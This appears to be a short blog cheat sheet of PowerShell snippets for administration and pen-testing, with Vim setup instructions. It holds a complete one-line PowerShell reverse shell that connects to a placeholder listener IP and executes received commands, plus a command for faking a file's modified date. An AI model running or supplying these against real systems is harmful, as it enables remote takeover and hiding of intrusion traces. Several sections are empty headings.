PowerShell for Hackers

As I’m learning more PowerShell and dabbling into hacking I will be composing a list of techniques and scripts that I find very beneficial for administration and pen-testing.



System Running Processes


IP to Hostname


Lookup User Information

net user /domain jamie.bowman

Change File Modified Date and Time

dir sample_file.txt).LastWriteTime = New-object DateTime 1976,12,31

Find Apps Running on Port

# find pids listening on port 80
netstat -ano | findstr ":80"

# look up pids
tasklist | findstr "4"

Querying Databases


PowerShell Reverse Shells

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


PowerShell Frameworks & Tools

These are proven frameworks that can be used to reliably exploit a Windows environment.

Using Vim with PowerShell

First, you’ll need to install Vim. Download, run and install the file “gvim82.exe” (as of 02/06/2020)…


Once Vim is installed you’ll need to run PowerShell in Administrator mode to configure the integration.

# install
Install-Package -Name PSReadline -Force -SkipPublisherCheck

# create aliases
New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'
New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vim edit mode
Set-PSReadlineOption -EditMode vi -BellStyle None

You can learn more from this article.